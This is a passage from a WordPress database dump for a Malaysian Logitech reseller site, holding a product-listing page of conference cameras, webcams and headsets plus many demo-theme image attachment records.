src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>CONNECT</h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-connect/\" role=\"button\">\n						View\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>BCC950</h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-bcc950/\" role=\"button\">\n						View\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>PTZ PRO 2</h3><p>HD 1080p video camera with enhanced pan/tilt and zoom</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-ptz-pro-2/\" role=\"button\">\n						View\n					</a>\n										<img width=\"500\" height=\"437\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-e1544499263206.png\" alt=\"\" />											\n		<h4>Rally Camera</h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-rally-camera/\" role=\"button\">\n						View\n					</a>\n		<h2>VC ROOM SOLUTIONS</h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.</p>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>SMARTDOCK</h3><p>Secure meeting room console designed for Skype Room Systems</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>WEBCAMS</h2><p>Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.</p>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>BRIO</h3><p>4K Ultra HD webcam with RightLightâ„¢ 3 with HDR</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech C930e</h3><p>Business webcam with a wide field of view and HD digital zoom</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech C925e</h3><p>Affordable 1080p HD webcam with integrated privacy shade</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech B525</h3><p>Ideal for on-the-go professionals with a compact, foldable, 360Â° swivel design</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>HEADSETS</h2><p>Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.</p>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech H570e Headset</h3><p>Comfortable, affordable, and built to last</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<h2>VIDEO COLLABORATION ACCESSORIES</h2>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>SMARTDOCK EXTENDER BOX</h3><p>Connectivity options for Logitech SmartDock</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech Screen Share</h3><p>A fast, familiar, and affordable way to share content in the conference room and into online meetings.</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP EXPANSION MICS</h3><p>Add-on mics for larger groups</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech SmartDock Flex</h3><p>Expansion Kit for Logitech SmartDock</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP 15M EXTENDED CABLE</h3><p>15 meter cable for video conferences in larger rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP 10M EXTENDED CABLE</h3><p>10 meter cable, ideal for large conference rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>EXPANSION MIC FOR MEETUP</h3><p>Add-on microphone for huddle room flexibility</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>','Logitech','','publish','closed','closed','','logitech','','','2019-03-04 15:01:31','2019-03-04 07:01:31','',0,'https://bintara.com.my/?page_id=16',0,'page','',0),(19,1,'2018-12-11 01:51:33','2018-12-11 01:51:33','[vfb id=\"1\"]','Contact Us','','publish','closed','closed','','contact-us','','','2018-12-11 10:59:48','2018-12-11 02:59:48','',0,'https://bintara.com.my/?page_id=19',0,'page','',0),(29,2,'2013-06-07 10:45:30','2013-06-07 10:45:30','','T_4_front','','inherit','open','open','','t_4_front-2','','','2013-06-07 10:45:30','2013-06-07 10:45:30','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/T_4_front1.jpg',0,'attachment','image/jpeg',0),(38,2,'2013-06-07 10:52:55','2013-06-07 10:52:55','','T_7_front','','inherit','open','open','','t_7_front','','','2013-06-07 10:52:55','2013-06-07 10:52:55','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/T_7_front.jpg',0,'attachment','image/jpeg',0),(39,2,'2013-06-07 10:53:29','2013-06-07 10:53:29','','T_7_back','','inherit','open','open','','t_7_back','','','2013-06-07 10:53:29','2013-06-07 10:53:29','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/T_7_back.jpg',0,'attachment','image/jpeg',0),(43,2,'2013-06-07 10:59:40','2013-06-07 10:59:40','','hoodie_7_front','','inherit','open','open','','hoodie_7_front','','','2013-06-07 10:59:40','2013-06-07 10:59:40','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/hoodie_7_front.jpg',0,'attachment','image/jpeg',0),(44,2,'2013-06-07 10:59:54','2013-06-07 10:59:54','','hoodie_7_back','','inherit','open','open','','hoodie_7_back','','','2013-06-07 10:59:54','2013-06-07 10:59:54','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/hoodie_7_back.jpg',0,'attachment','image/jpeg',0),(45,2,'2013-06-07 11:00:00','2013-06-07 11:00:00','','hoodie_1_back','','inherit','open','open','','hoodie_1_back','','','2013-06-07 11:00:00','2013-06-07 11:00:00','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/hoodie_1_back.jpg',0,'attachment','image/jpeg',0),(46,2,'2013-06-07 11:00:01','2013-06-07 11:00:01','','hoodie_1_front','','inherit','open','open','','hoodie_1_front','','','2013-06-07 11:00:01','2013-06-07 11:00:01','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/hoodie_1_front.jpg',0,'attachment','image/jpeg',0),(48,2,'2013-06-07 11:01:23','2013-06-07 11:01:23','','hoodie_2_front','','inherit','open','open','','hoodie_2_front','','','2013-06-07 11:01:23','2013-06-07 11:01:23','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/hoodie_2_front.jpg',0,'attachment','image/jpeg',0),(1218,2,'2013-06-07 10:35:28','2013-06-07 10:35:28','','T_1_front','','inherit','open','open','','t_1_front','','','2013-06-07 10:35:28','2013-06-07 10:35:28','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/T_1_front.jpg',0,'attachment','image/jpeg',0),(1219,2,'2013-06-07 10:35:39','2013-06-07 10:35:39','','T_1_back','','inherit','open','open','','t_1_back','','','2013-06-07 10:35:39','2013-06-07 10:35:39','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/T_1_back.jpg',0,'attachment','image/jpeg',0),(1220,2,'2013-06-07 10:41:23','2013-06-07 10:41:23','','T_2_front','','inherit','open','open','','t_2_front','','','2013-06-07 10:41:23','2013-06-07 10:41:23','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/T_2_front.jpg',0,'attachment','image/jpeg',0),(1221,2,'2013-06-07 10:41:34','2013-06-07 10:41:34','','T_2_back','','inherit','open','open','','t_2_back','','','2013-06-07 10:41:34','2013-06-07 10:41:34','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/T_2_back.jpg',0,'attachment','image/jpeg',0),(1222,2,'2013-06-07 10:45:14','2013-06-07 10:45:14','','T_4_front','','inherit','open','open','','t_4_front','','','2013-06-07 10:45:14','2013-06-07 10:45:14','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/T_4_front.jpg',0,'attachment','image/jpeg',0),(1223,2,'2013-06-07 10:45:26','2013-06-07 10:45:26','','T_3_back','','inherit','open','open','','t_3_back','','','2013-06-07 10:45:26','2013-06-07 10:45:26','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/T_3_back.jpg',0,'attachment','image/jpeg',0),(1224,2,'2013-06-07 10:45:27','2013-06-07 10:45:27','','T_3_front','','inherit','open','open','','t_3_front','','','2013-06-07 10:45:27','2013-06-07 10:45:27','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/T_3_front.jpg',0,'attachment','image/jpeg',0),(1225,2,'2013-06-07 10:45:29','2013-06-07 10:45:29','','T_4_back','','inherit','open','open','','t_4_back','','','2013-06-07 10:45:29','2013-06-07 10:45:29','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/T_4_back.jpg',0,'attachment','image/jpeg',0),(1226,2,'2013-06-07 10:49:13','2013-06-07 10:49:13','','T_5_front','','inherit','open','open','','t_5_front','','','2013-06-07 10:49:13','2013-06-07 10:49:13','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/T_5_front.jpg',0,'attachment','image/jpeg',0),(1227,2,'2013-06-07 10:49:23','2013-06-07 10:49:23','','T_5_back','','inherit','open','open','','t_5_back','','','2013-06-07 10:49:23','2013-06-07 10:49:23','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/T_5_back.jpg',0,'attachment','image/jpeg',0),(1228,2,'2013-06-07 10:51:51','2013-06-07 10:51:51','','T_6_front','','inherit','open','open','','t_6_front','','','2013-06-07 10:51:51','2013-06-07 10:51:51','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/T_6_front.jpg',0,'attachment','image/jpeg',0),(1229,2,'2013-06-07 10:52:02','2013-06-07 10:52:02','','T_6_back','','inherit','open','open','','t_6_back','','','2013-06-07 10:52:02','2013-06-07 10:52:02','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/T_6_back.jpg',0,'attachment','image/jpeg',0),(49,2,'2013-06-07 11:02:26','2013-06-07 11:02:26','','hoodie_2_back','','inherit','open','open','','hoodie_2_back','','','2013-06-07 11:02:26','2013-06-07 11:02:26','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/hoodie_2_back.jpg',0,'attachment','image/jpeg',0),(51,2,'2013-06-07 11:03:16','2013-06-07 11:03:16','','hoodie_3_front','','inherit','open','open','','hoodie_3_front','','','2013-06-07 11:03:16','2013-06-07 11:03:16','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/hoodie_3_front.jpg',0,'attachment','image/jpeg',0),(52,2,'2013-06-07 11:03:50','2013-06-07 11:03:50','','hoodie_3_back','','inherit','open','open','','hoodie_3_back','','','2013-06-07 11:03:50','2013-06-07 11:03:50','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/hoodie_3_back.jpg',0,'attachment','image/jpeg',0),(54,2,'2013-06-07 11:05:03','2013-06-07 11:05:03','','hoodie_4_front','','inherit','open','open','','hoodie_4_front','','','2013-06-07 11:05:03','2013-06-07 11:05:03','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/hoodie_4_front.jpg',0,'attachment','image/jpeg',0),(55,2,'2013-06-07 11:05:13','2013-06-07 11:05:13','','hoodie_4_back','','inherit','open','open','','hoodie_4_back','','','2013-06-07 11:05:13','2013-06-07 11:05:13','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/hoodie_4_back.jpg',0,'attachment','image/jpeg',0),(57,2,'2013-06-07 11:06:32','2013-06-07 11:06:32','','hoodie_5_front','','inherit','open','open','','hoodie_5_front','','','2013-06-07 11:06:32','2013-06-07 11:06:32','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/hoodie_5_front.jpg',0,'attachment','image/jpeg',0),(58,2,'2013-06-07 11:07:10','2013-06-07 11:07:10','','hoodie_5_back','','inherit','open','open','','hoodie_5_back','','','2013-06-07 11:07:10','2013-06-07 11:07:10','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/hoodie_5_back.jpg',0,'attachment','image/jpeg',0),(61,2,'2013-06-07 11:12:02','2013-06-07 11:12:02','','hoodie_6_front','','inherit','open','open','','hoodie_6_front','','','2013-06-07 11:12:02','2013-06-07 11:12:02','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/hoodie_6_front.jpg',0,'attachment','image/jpeg',0),(62,2,'2013-06-07 11:12:16','2013-06-07 11:12:16','','hoodie_6_back','','inherit','open','open','','hoodie_6_back','','','2013-06-07 11:12:16','2013-06-07 11:12:16','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/hoodie_6_back.jpg',0,'attachment','image/jpeg',0),(68,2,'2013-06-07 11:21:34','2013-06-07 11:21:34','','poster_1_up','','inherit','open','open','','poster_1_up','','','2013-06-07 11:21:34','2013-06-07 11:21:34','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/poster_1_up.jpg',0,'attachment','image/jpeg',0),(69,2,'2013-06-07 11:22:05','2013-06-07 11:22:05','','Poster_1_flat','','inherit','open','open','','poster_1_flat','','','2013-06-07 11:22:05','2013-06-07 11:22:05','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/Poster_1_flat.jpg',0,'attachment','image/jpeg',0),(71,2,'2013-06-07 11:24:19','2013-06-07 11:24:19','','poster_2_up','','inherit','open','open','','poster_2_up','','','2013-06-07 11:24:19','2013-06-07 11:24:19','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/poster_2_up.jpg',0,'attachment','image/jpeg',0),(72,2,'2013-06-07 11:24:47','2013-06-07 11:24:47','','Poster_2_flat','','inherit','open','open','','poster_2_flat','','','2013-06-07 11:24:47','2013-06-07 11:24:47','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/Poster_2_flat.jpg',0,'attachment','image/jpeg',0),(74,2,'2013-06-07 11:26:47','2013-06-07 11:26:47','','poster_3_up','','inherit','open','open','','poster_3_up','','','2013-06-07 11:26:47','2013-06-07 11:26:47','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/poster_3_up.jpg',0,'attachment','image/jpeg',0),(75,2,'2013-06-07 11:27:31','2013-06-07 11:27:31','','Poster_3_flat','','inherit','open','open','','poster_3_flat','','','2013-06-07 11:27:31','2013-06-07 11:27:31','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/Poster_3_flat.jpg',0,'attachment','image/jpeg',0),(77,2,'2013-06-07 11:28:07','2013-06-07 11:28:07','','poster_4_up','','inherit','open','open','','poster_4_up','','','2013-06-07 11:28:07','2013-06-07 11:28:07','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/poster_4_up.jpg',0,'attachment','image/jpeg',0),(78,2,'2013-06-07 11:28:20','2013-06-07 11:28:20','','Poster_4_flat','','inherit','open','open','','poster_4_flat','','','2013-06-07 11:28:20','2013-06-07 11:28:20','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/Poster_4_flat.jpg',0,'attachment','image/jpeg',0),(80,2,'2013-06-07 11:29:26','2013-06-07 11:29:26','','poster_5_up','','inherit','open','open','','poster_5_up','','','2013-06-07 11:29:26','2013-06-07 11:29:26','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/poster_5_up.jpg',0,'attachment','image/jpeg',0),(81,2,'2013-06-07 11:29:37','2013-06-07 11:29:37','','Poster_5_flat','','inherit','open','open','','poster_5_flat','','','2013-06-07 11:29:37','2013-06-07 11:29:37','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/Poster_5_flat.jpg',0,'attachment','image/jpeg',0),(84,2,'2013-06-07 11:32:44','2013-06-07 11:32:44','','cd_1_angle','','inherit','open','open','','cd_1_angle','','','2013-06-07 11:32:44','2013-06-07 11:32:44','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/cd_1_angle.jpg',0,'attachment','image/jpeg',0),(1230,2,'2016-02-12 08:00:25','2016-02-12 08:00:25',' Interactive Designer ','Peter Mendez','','inherit','open','closed','','team1','','','2016-02-12 08:00:25','2016-02-12 08:00:25','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2016/02/team1.jpg',0,'attachment','image/jpeg',0),(1231,2,'2016-02-12 08:00:26','2016-02-12 08:00:26',' Director Of Production ','Harry Allen','','inherit','open','closed','','team2','','','2016-02-12 08:00:26','2016-02-12 08:00:26','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2016/02/team2.jpg',0,'attachment','image/jpeg',0),(1232,2,'2016-02-12 08:00:28','2016-02-12 08:00:28',' Founder & CTO ','Victoria Stephens','','inherit','open','closed','','team3','','','2016-02-12 08:00:28','2016-02-12 08:00:28','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2016/02/team3.jpg',0,'attachment','image/jpeg',0),(1233,2,'2016-02-12 08:00:29','2016-02-12 08:00:29','Senior Developer','Thomas Wade','','inherit','open','closed','','team4','','','2016-02-12 08:00:29','2016-02-12 08:00:29','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2016/02/team4.jpg',0,'attachment','image/jpeg',0),(1234,2,'2016-02-12 08:00:30','2016-02-12 08:00:30','Founder & CEO ','Alexander Rios','','inherit','open','closed','','team5','','','2016-02-12 08:00:30','2016-02-12 08:00:30','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2016/02/team5.jpg',0,'attachment','image/jpeg',0),(1235,2,'2016-02-12 08:00:32','2016-02-12 08:00:32','User Experience','George Wells','','inherit','open','closed','','team7','','','2016-02-12 08:00:32','2016-02-12 08:00:32','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2016/02/team7.jpg',0,'attachment','image/jpeg',0),(1236,2,'2016-02-12 08:00:33','2016-02-12 08:00:33',' Client Engagement ','Jonathan Green','','inherit','open','closed','','team8','','','2016-02-12 08:00:33','2016-02-12 08:00:33','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2016/02/team8.jpg',0,'attachment','image/jpeg',0),(1237,2,'2016-02-12 08:03:43','2016-02-12 08:03:43','','hero4','','inherit','open','closed','','hero4','','','2016-02-12 08:03:43','2016-02-12 08:03:43','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2016/02/hero4.jpg',0,'attachment','image/jpeg',0),(85,2,'2013-06-07 11:32:57','2013-06-07 11:32:57','','cd_1_flat','','inherit','open','open','','cd_1_flat','','','2013-06-07 11:32:57','2013-06-07 11:32:57','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/cd_1_flat.jpg',0,'attachment','image/jpeg',0),(88,2,'2013-06-07 11:33:53','2013-06-07 11:33:53','','cd_2_angle','','inherit','open','open','','cd_2_angle','','','2013-06-07 11:33:53','2013-06-07 11:33:53','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/cd_2_angle.jpg',0,'attachment','image/jpeg',0),(89,2,'2013-06-07 11:34:07','2013-06-07 11:34:07','','cd_2_flat','','inherit','open','open','','cd_2_flat','','','2013-06-07 11:34:07','2013-06-07 11:34:07','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/cd_2_flat.jpg',0,'attachment','image/jpeg',0),(91,2,'2013-06-07 11:34:58','2013-06-07 11:34:58','','cd_3_angle','','inherit','open','open','','cd_3_angle','','','2013-06-07 11:34:58','2013-06-07 11:34:58','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/cd_3_angle.jpg',0,'attachment','image/jpeg',0),(92,2,'2013-06-07 11:35:10','2013-06-07 11:35:10','','cd_3_flat','','inherit','open','open','','cd_3_flat','','','2013-06-07 11:35:10','2013-06-07 11:35:10','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/cd_3_flat.jpg',0,'attachment','image/jpeg',0),(94,2,'2013-06-07 11:36:10','2013-06-07 11:36:10','','cd_4_flat','','inherit','open','open','','cd_4_flat','','','2013-06-07 11:36:10','2013-06-07 11:36:10','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/cd_4_flat.jpg',0,'attachment','image/jpeg',0),(95,2,'2013-06-07 11:36:22','2013-06-07 11:36:22','','cd_4_angle','','inherit','open','open','','cd_4_angle','','','2013-06-07 11:36:22','2013-06-07 11:36:22','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/cd_4_angle.jpg',0,'attachment','image/jpeg',0),(97,2,'2013-06-07 11:37:04','2013-06-07 11:37:04','','cd_5_angle','','inherit','open','open','','cd_5_angle','','','2013-06-07 11:37:04','2013-06-07 11:37:04','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/cd_5_angle.jpg',0,'attachment','image/jpeg',0),(98,2,'2013-06-07 11:37:17','2013-06-07 11:37:17','','cd_5_flat','','inherit','open','open','','cd_5_flat','','','2013-06-07 11:37:17','2013-06-07 11:37:17','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/cd_5_flat.jpg',0,'attachment','image/jpeg',0),(100,2,'2013-06-07 11:37:51','2013-06-07 11:37:51','','cd_6_angle','','inherit','open','open','','cd_6_angle','','','2013-06-07 11:37:51','2013-06-07 